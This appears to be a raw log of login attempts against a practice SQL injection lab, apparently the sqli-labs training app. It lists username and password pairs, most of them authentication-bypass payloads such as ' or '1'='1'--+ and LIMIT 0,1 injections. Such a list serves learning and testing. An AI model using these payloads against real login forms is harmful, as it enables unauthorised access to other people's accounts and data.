User Name:111Password:111
User Name:admin--+Password:
User Name:12 or 1=1Password:12 or 1=1
User Name:123 or 1Password:123 or 1
User Name:12' or '1'='1'Password:12' or '1'='1'--+
User Name:12' or '1'='1'Password:12' or '1'='1'--+
User Name:12' or '1'='1'Password:12' or '1'='1--+
User Name:12' or '1' = '1'Password:' or '1' = '1'--+
User Name:adminPassword:1' or '1' = '1'--+
User Name:DumbPassword:Dump
User Name:AngelinaPassword:I-kill-you
User Name:DummyPassword:‘1’ or '1'='1
User Name:DummyPassword:1’ or ‘a’ = 'a
User Name:DummyPassword:123135’ or ‘a’ = 'a
User Name:DummyPassword:'or 1=1
User Name:DummyPassword:444'or 1=1
User Name:123Password:123 or '1'='1'
User Name:123Password:123' or '1'='1'
User Name:123Password:123' or '1'='1
User Name:123Password:123' or '1'='1
User Name:AngelinPassword:LIMIT 0,1--+
User Name:AngelinPassword:LIMIT 0,1;--+
User Name:AngelinPassword:LIMIT 0,1;--+
User Name:Angelin LIMIT 0,1;--+Password:
User Name:Angelin LIMIT 0,1;"--+Password:
User Name:Angelin' LIMIT 0,1;"--+Password:
User Name:Angelin' LIMIT 0,1"--+Password:
User Name:Angelin' LIMIT 0,1"%23Password:
User Name:Angelin' LIMIT 0,1"%23;Password:
User Name:Angelin' LIMIT 0,1"--+;Password:
User Name:Angelina' LIMIT 0,1"--+;Password:
User Name:Angelina' LIMIT 0,1;"--+;Password:
User Name:Angelina' LIMIT 0,1";%23Password:
User Name:Angelina' LIMIT 0,1";%23Password:
User Name:Angelina' LIMIT 0,1";#Password:
